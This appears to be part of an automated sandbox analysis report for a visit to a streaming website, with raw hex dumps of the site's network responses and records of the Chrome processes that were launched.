                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 82 26 01 fe eb a5 6a 9a 8d 13 0e c6 98 f8 82 b6 d9 5c 74 07 72 cb b8 b2 20 2d de 72 93 24 85 75 e4 d9 3b 09 c2 ec 87 f7 85 37 36 ac 69 8e 9c 18 98 b6 0b 2f 56 8f 8e b6 72 0c e2 cc 70 c9 61 f4 c0 a0 5b 67 9e a3 82 3f 95 31 32 17 7e da bc f9 80 2a f9 99 f7 5d 97 f1 46 09 6e 45 fa 69 f6 37 ae 63 f0 ee 99 8a 42 be d9 d8 de fe 33 3f 6d 11 02 a3 3f e3 45 26 a4 69 4e 32 21 df a9 21 47 93 78 04 6f d2 db f8 39 95 bf 6b 93 1b 2d e3 a9 46 cf 2b 4f 4f fc 0c c9 1b d9 09 4b 6e b3 06 1a e8 02 28 51 b8 06 be 1a c7 af dc 9d 3b 3f eb 18 ce 1d 91 c2 1c 1a 7e 65 d8 22 f1 a9 5f 4d b3 14 3b a5 0e 97 00 62 e2 d6 9b e3 c8 56 09 6c 74 17 a3 bb 5b 6b 92 79 1b 0c e9 3f 83 6f d3 a9 02 76 02 61 d8 d2 8c 61 4c 6d 1f 9c 65 ee 58 8b 1b 0e a7 83 0e b6 db 05 c7 46 e6 05 7d 3c 9f 0c 9f ba
                                                                                                                                                                                          Data Ascii: &j\tr -r$u;76i/Vrpa[g?12~*]FnEi7cB3?m?E&iN2!!Gxo9k-F+OOKn(Q;?~e"_M;bVlt[ky?ovaaLmeXF}<
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 60 63 c7 cd 7c bb 7e 2f df 69 a1 d7 ef c3 71 d1 69 6a 71 1c 47 f2 2b 31 4f 81 f6 fc 4f 86 f1 e0 cf 0b 34 4c e1 b8 3d a6 04 e0 3c 76 0d 82 74 7a 05 3d cd 41 2d fc df ee 15 b6 98 43 4b 6b 50 d6 db 63 2b 56 53 e8 f5 93 dc 86 b7 07 63 b6 7b 81 e2 e3 b6 a5 6b c7 72 d5 2e bc 41 a9 bf 70 43 8f e4 ce c1 d4 ec 7c 95 ad 38 28 5f b6 da fb 8a 56 0c 57 f3 1a a3 5c ec ec 2e d6 b6 48 7c 4e db 34 55 31 46 a7 4e ff 00 3f 5b 7f 37 f5 66 e2 37 3b 82 77 44 ee c2 fa f1 3b 82 0b 7e 27 73 e6 1b 75 39 78 dc ee 89 dc 9d d1 3b 83 fa ee 7c ce ec ee 7c c3 66 b7 3b 90 59 bd 45 3b f3 f7 37 81 07 ff 00 83 37 01 df c4 e9 df 2f eb 6f e6 df f6 9b 9c a0 3f 7e a7 19 c7 50 2c d7 a7 4f f9 7f 53 80 b3 e8 16 7e 9e 27 e9 e2 7d 02 cf a0 59 f4 0b 3f 4f 49 f4 0b 3e 81 67 e9 e9 3f 4f 49 fa 7a 4f d3
                                                                                                                                                                                          Data Ascii: `c|~/iqijqG+1OO4L=<vtz=A-CKkPc+VSc{kr.ApC|8(_VW\.H|N4U1FN?[7f7;wD;~'su9x;||f;YE;77/o?~P,OS~'}Y?OI>g?OIzO
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: cf ea 8e a2 23 26 b4 fc 1b 88 cb 53 ca 23 46 72 d7 b1 c7 72 d7 51 49 ad cc c3 08 f3 bb 9c be e3 e3 d9 a6 38 5b d8 89 59 91 c0 64 a2 dc 39 a0 79 0d 91 9a d5 61 32 24 4a 16 d9 d1 b3 46 59 8b 66 31 ac 5f 20 14 da 86 a4 e1 a1 63 67 30 f2 d6 13 a8 05 8a 95 24 15 b0 99 d7 72 c9 63 2c 4b b9 fe 5b 39 1b aa 3b 29 25 46 74 3a 44 ea 4e 52 e2 e6 dd 60 76 b3 d4 4d c3 cd 47 83 b7 6c 54 7f 80 ab d6 20 c5 5c f3 94 0f 19 1c a8 de af 22 60 96 f8 3b 8e f2 46 d6 8c a9 13 aa 5e 48 00 fb 84 25 47 19 48 e3 56 bc 4c c5 21 58 e6 5e 8d 41 92 07 65 60 92 8d eb 2e db 98 b3 69 1c 62 c3 48 ba 43 cd 3d 6b c7 95 92 5b a4 8d 37 3c 57 82 52 c0 47 f8 0a d5 a6 68 d2 27 4f 98 4d b8 35 1d 46 62 41 a4 79 67 62 ac c2 fb 79 64 e9 6f f2 4d 1b 6b e9 36 b1 6b 29 23 5d e4 d9 de e5 89 7b 4b b0 ae 0b
                                                                                                                                                                                          Data Ascii: #&S#FrrQI8[Yd9ya2$JFYf1_ cg0$rc,K[9;)%Ft:DNR`vMGlT \"`;F^H%GHVL!X^Ae`.ibHC=k[7<WRGh'OM5FbAygbydoMk6k)#]{K
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 4f 92 91 4b ac 5d 4c 36 bd a5 d0 53 db 79 46 d1 81 dd 56 95 62 8e 50 aa 58 a8 e3 c3 b6 58 9a d1 7f b2 5a 6b d8 14 ec 6b cd 42 0b 35 52 d6 77 d3 cb b9 a4 b3 d5 24 b8 d4 98 d1 b6 86 59 af 66 6d 2c 37 a2 8f 74 e1 0e a5 26 75 47 cc e2 28 ad 66 64 b1 ba ba 68 43 5d c7 05 94 5a 86 9c d6 d3 9c f4 32 31 f3 64 8b b5 de 8e 5b 7b 34 8c 36 f0 45 68 c3 2f 30 a5 b1 8d ad ee 67 33 09 27 8a ca d8 5d 4c f6 f6 26 33 69 0c f1 5d a6 6d f4 4b b7 53 1c c2 31 1a 05 5b 4f 5a 26 67 5f a3 85 17 12 5c bc 71 c5 69 da 8d b5 28 20 fc 2e 1d 75 15 11 2b 21 46 2a d5 8a b3 03 2d 52 4a 00 da 5e 5d c4 53 36 e2 48 d3 e5 64 8e e9 96 d7 4a bb 9d 12 07 bc d1 11 9d ae 1e 2d 62 c5 7b 61 87 f2 8b 23 e5 ef d9 a3 59 51 f5 38 93 20 0b a9 65 94 30 ed bc 97 0c 1e 2b 39 0d b8 b6 91 74 98 00 e5 20 44 fc
                                                                                                                                                                                          Data Ascii: OK]L6SyFVbPXXZkkB5Rw$Yfm,7t&uG(fdhC]Z21d[{46Eh/0g3']L&3i]mKS1[OZ&g_\qi( .u+!F*-RJ^]S6HdJ-b{a#YQ8 e0+9t D
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 8e ca 06 10 a1 b9 0a 8f 84 37 a1 27 59 e4 ed c2 aa 16 ea 8f 34 1e 5b bc 47 e0 20 de 58 f8 8f ae 94 fd 70 f0 14 19 55 55 17 ec 6e b3 18 4a 42 7b de f4 b2 da f2 32 93 a3 39 f9 2c e2 b1 a4 32 47 c9 5e 13 bd 53 ff 00 96 f5 5c f7 cf 4e e4 f6 1a c0 85 65 14 85 bb 4b 9f 4c 06 a8 e3 5e 14 0a d5 99 e3 34 67 11 9c 9b ba 3d 82 db 9e f9 f1 52 2f 17 e7 16 41 fa a0 bb 66 e1 09 36 56 0b 88 6c 9b cd 5c e5 7a 4f 6c 93 f2 ce 6a 92 6f 53 ea ac 71 ba a7 61 ad ea ad d8 50 22 be ad 2c 15 95 a2 c2 ff 00 0d e8 b5 eb 7d 8b ac ee ef b7 f4 42 9b 78 f1 41 05 0a 97 4b cd 31 db 54 2a a1 1d ad 22 f2 3d a5 c2 f1 68 0c 02 92 eb 6c f9 c9 47 fe c1 33 c3 e5 48 34 5d 5a f3 2a 23 cd 17 1b 6d a5 7e c6 1e 36 ec 0e 3e 23 a1 3c 3e e7 70 47 f6 63 2a c6 7e 38 2e a0 ff 00 24 2b f9 35 de 6e 4a 2f f4
                                                                                                                                                                                          Data Ascii: 7'Y4[G XpUUnJB{29,2G^S\NeKL^4g=R/Af6Vl\zOljoSqaP",}BxAK1T*"=hlG3H4]Z*#m~6>#<>pGc*~8.$+5nJ/


                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                          Start time:06:37:45
                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                          Imagebase:0x7ff7f9810000
                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                          Start time:06:37:46
                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2016,i,16068684791565395002,4372320431885380425,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                          Imagebase:0x7ff7f9810000
                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                          Start time:06:37:47
                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://fsharetv.co/"
                                                                                                                                                                                          Imagebase:0x7ff7f9810000
                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          No disassembly